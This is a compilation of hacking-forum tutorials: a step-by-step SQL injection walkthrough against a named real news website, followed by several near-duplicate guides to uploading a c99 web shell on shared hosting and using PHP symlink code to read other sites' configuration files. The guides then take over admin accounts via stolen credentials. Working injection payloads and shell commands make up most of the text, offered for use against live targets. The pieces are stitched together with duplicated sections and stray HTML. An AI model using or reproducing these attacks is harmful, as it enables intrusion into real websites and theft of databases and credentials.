An Sqli hack. From string based to error based to double query injection.

An Sqli hack. From string based to error based to double query injection. Shout out to my good friend zerofreak who helped me with syntax issues and help me with this method.

Ok So today the vulnerable site in question and demonstration is.

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=1493

We start like any other sqli test with the ' at the end of the URL.

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=1493'

We see:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1493''' at line 1

First sign that it is vulnerable now lets continue to count the columns. For this we do an Order by.

Lets start with 20.

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=null order by 20--

Page returns with no error so 20+ columns exist. Lets continue...

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=null order by 25--

Still no error. Lets go higher.

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=null order by 30--

Still no error. At this point I have an idea of what may be happening so I do.

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=null'order by 30--+

Unknown column '30' in 'order clause'

As you see adding the new command operators has triggered the error. This is called string base injection.

Now we have to figure out the correct number of columns with our new injection method.

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=null'order by 20--+

Unknown column '20' in 'order clause'

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=null'order by 19--+

No error. Means 19 columns exist. Now lets get vulnerable column number.

For this we use union select.

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=null' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+-

The used SELECT statements have a different number of columns

WTF you may ask? This can happen quite regularly. It does not mean you have done anything wrong. We both know we have correctly counted the columns and that are syntax was correct. We now just have to switch injection method to Error Based.

First we want to get the database.

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=null'and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-

There we go. The name of the database:



'fairfax~1'

Next lets get the tables.

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=1493'and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-

Unfortunately the tables in this database are pretty crappy so I am for demonstration purposes I am using the first table in the database to extract data from via the first two columns.

The response we got for the first table was:

Duplicate entry 'archive_view~1' for key 1

We will need to hex the table name for our next command when we get the column data contained within the table.

Important disregard the ~1 of the table name and just 'text to hex' archive_view

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=1493' and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x617263686976655f7669657 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-

It loads normally so that indicates to us that we need to switch to double query injection. God damn.

Double query is basically doubling the query to throw errors which will contain vital data within it.

However it involves a little more hexing, we need to hex the database name and the table name within our query.

So lets hex each of them:

Database

Quote:fairfax = 666169726661780920

Table name.

Quote:archive_view = 617263686976655f76696577

And in our query:

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=1493' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0x66616972666178 AND table_name=0x617263686976655f76696577 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+

We see the name of our first column:



To go to the next column we change the query to:

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=1493' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0x66616972666178 AND table_name=0x617263686976655f76696577 LIMIT 1,1)) from information_schema.tables limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+

Etc etc.

So now we know this:

Table is called archive_view

The first two columns of archive_view table are called:

id

And

pubdate

Now lets extract the data contained within the columns from the table.

As this is double query each column has to be done seperately. Its not like regular sqli in which username and password can both we extracted and delivered at the same time.

Below we have to specify the table name we are extracting from, the column name we are extracting from the table and the database name.

This is how the query looks:

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=1493' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(archive_view.id as char),0x27,0x7e) FROM `fairfax`.archive_view LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+

And you get the data contained for the first result within the id column in the archive_view table:



You can also implement the query via the 0,1 if for example your extracting usernames or passwords.

Now lets do the second column called pubdate.

We simple change the id to pubdate in the query like below:

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=1493' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(archive_view.pubdate as char),0x27,0x7e) FROM `fairfax`.archive_view LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+

And there we go. It looks like this:



We have recovered data from two sets of columns from the first table within the database using several different forms of sqli. In an ideal situation you would apply these methods to username and password and email extraction.

Hope you's enjoyed the tutorial. Brought to you by VipVince.

Private Symlink(PHP) Exploit Tutorial

First of all we use Symlink function to make a shortcut for any file or folder we want

that's why this function will be very useful for us to read any folder or file we want(For More Info Use Google).

Here We are using the Shell Named "c99" to execute the small code of php(Eval Code) on the shared hosting server.

The Exploit is used to download the slave's database If and only if the slave is in a shared host


Download the below Shell & Follow the steps.

================================================== ==============
Get Any C99 Shell
================================================== ==============

/Step 1 $ Upload the php i.e Shell_Silic0n.php

Shell on your root path. That is /home/hackerz/public_html .

/Step 2 $ Open the uploaded file . The path will look like

================================================== ==============================​==
http://www.yoursitename.com/shell_Silic0n.php
================================================== ==============================​==


/Step 3 $ Next Step is read carefully the below php Eval Code . it's about 10 lines of php code.


!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!​!!!

$filepath='/home/xx/public_html/xx.xx';
$sitepath='/home/xx/public_html/';
$writeblefilepath='myfile.txt';$flib=$sitepath.$wr iteblefilepath;
@unlink($flib);
symlink($filepath, $flib);
echo readlink($flib) . "\n";
echo "".file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/" . $writeblefilepath)."</tex" . "tarea>";<br />@unlink($flib);<br /><br />!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!​!!!!<br /><br />/Step 4 $ You should replace (xx) in the code in the upper two lines.<br /><br />In the 1st xx in the line one, means the target username.<br /><br />In the 2nd xx.xx in the line one, means the target file full path in other word it's<br /><br />usually used to read database configuration files to to steel it's connection information.<br /><br />xx in the line two, means your username. "For Eg :- /home/Your_Ass/public_html/configuration.php"<br /><br />$writeblefilepath, to enter any writable path on your site & also it is used fo to do the link process,<br /><br />and write the output.For @unlink you can search for them on php.net </span>

Symlink (PHP) Exploit

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​+
Tutorial Name: Symlink (PHP) Exploit [Private (PhP Code)For Sometimes]
Author: dREviL
*Dont Share without credits*
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​+
First of all we use symlink to read config file of other sites hosted in the same servers . Symlinkung can be done in many methods , and today i will show a new one that was private for sometimes and now its shared . In this tuto we will excecute a php(Eval Code) to symlink in a shared hosting . Let'Begin .We need a shell that allwows php eval code excecuting. First we get the full path of root /home/r00tb0x/public_html .And now the php code

Code:

$filepath='/home/username/public_html/txtfile';
$sitepath='/home/edit/public_html/';
$writeblefilepath='myfile.txt';$flib=$sitepath.$wr iteblefilepath;
@unlink($flib);
symlink($filepath, $flib);
echo readlink($flib) . "\n";
echo "".file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/" . $writeblefilepath)."</tex" . "tarea>";<br /> @unlink($flib);</code></div></div> Now lets Edit Some Lines Of The Code.In the $filepath='/home/username/public_html/txtfile'; replace username with the username of the target website hosted in the same server...Then replace the txtfile with the txt file.txt u created for reading config..$writeblefilepath here u must enter ur writable path..From here u will be able to explore other sites hosted in the same server ..<br /><br />Hope u Understand me !!!

How to symlink on a linux server [TuT] [Website hacking !!]

How to symlink ? (TUTORIAL)

Written by -ThatGuy- for begginer webhackers.

NOTE : I do not take any responsibility for your actions. This was written for educational purposes only ! Also sorry for my bad english !

Hello HackForums.
Today i'll try to help begginer webhackers by teaching them a method called symlink.

What is symlink ?
Symlink is a method used by hackers to read files from other users on a linux server, only by using a php-shell.

So what do we require to start the tutorial :

Requirements :

- a phpshell uploaded in a linux server (Safe MODE = OFF )
- a target site
- basic phpshell & linux knowledge
- a brain !

Let's start by the tutorial.

Where to get a target, if you only have a phpshell uploaded in a linux server that has some sites ?
It's easy , first get the IP of the server.
Then go to bing.com and search like that :

Code:

ip:xx.xxx.xxx.xxx vbulletin

xxx replace with the ip adress of the server , and 'vbulletin', you can change to a name of a forum software or a CMS you wish as a target. But for this example i'll take vBulletin.

OK , now we got the target site , let's suppose that its domain name is mytarget.com and it uses vBulletin forum software.

Now starts the real hacking !

Go to your phpshell , and in the 'Execute command' field , execute there that command :

Code:

ls -la /etc/valiases/mytarget.com

By executing this command , i'll get the name of the user (on the linux server) that keeps the website mytarget.com.
It should return with a result similar to that :

>>>>>>>-rw-r--r-- 1 target mail 28 May 28 2011 /etc/valiases/mytarget.com

The red colored piece is the user of mytarget.com on the server.
So in our case the username is 'target'

Many of us know that the configuration file of vBulletin script ,can be found in /includes/config.php.
This is the file we need to read in our case , in order to get access at our target site.
How can we read that file ?
Simple , execute that command on the shell :

Code:

ln -s /home/target/public_html/includes/config.php symlink.txt

As you can see, we're writting the content of config.php , into symlink.txt file.
After you execute the command , you will se a new file called symlink.txt.
Open it and w00t !! You successfully read the configuration file (symlinked).
Now , just get an MySQL connector script coded in PHP , and login with the details you get from configuration file of your target.Then at the admin table, get the admin's hash and crack it , or better , change the admin's email you yours , and then do a forgot password at mytarget.com
And then you successfully will get full access in your target site !

That was all ,very easy if you practice many times. Maybe soon i will make a video tutorial if you still didn't understand , just request the video tut in the comments , and i will try ASAP to make it for you !

Thanks for reading , -ThatGuy- !

shrimlinking

++ ++
~*^...Symlink(PHP) Exploit Tutorial by Indian Cyber Army...^*~
++ ++

First of all we use Symlink function to make a shortcut for any file or folder we want

that's why this function will be very useful for us to read any folder or file we want(For More Info Use Google).

Here We are using the Shell Named "c99" to execute the small code of php(Eval Code) on the shared hosting server.

The Exploit is used to download the slave's database If and only if the slave is in a shared host

Download the below Shell & Follow the steps.

== ==
Get Any C99 Shell
== ==

/Step 1 $ Upload the php i.e Shell_ica.php

Shell on your root path. That is /home/hackerz/public_html .

/Step 2 $ Open the uploaded file . The path will look like

== ==​==
http://www.yoursitename.com/shell_ica.php
== ==​==

/Step 3 $ Next Step is read carefully the below php Eval Code . it's about 10 lines of php code.

!! !!​!!!

$filepath='/home/xx/public_html/xx.xx';
$sitepath='/home/xx/public_html/';
$writeblefilepath='myfile.txt';$flib=$sitepath.$wr iteblefilepath;
@unlink($flib);
symlink($filepath, $flib);
echo readlink($flib) . "\n";
echo "".file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/" . $writeblefilepath)."</tex" . "tarea>";<br />@unlink($flib);<br /><br />!! !!​!!!!<br /><br />/Step 4 $ You should replace (xx) in the code in the upper two lines.<br /><br />In the 1st xx in the line one, means the target username.<br /><br />In the 2nd xx.xx in the line one, means the target file full path in other word it's<br /><br />usually used to read database configuration files to to steel it's connection information.<br /><br />xx in the line two, means your username. "For Eg :- /home/Your_Ass/public_html/configuration.php"<br /><br />$writeblefilepath, to enter any writable path on your site & also it is used fo to do the link process,<br /><br />and write the output.For @unlink you can search for them on php.net .<br /><br />|<br /><br />|<br /><br />|<br /><br />|<br /><br />__- -- - -- - - -- - --- - -- - -- - -- -<br /><br />THE END..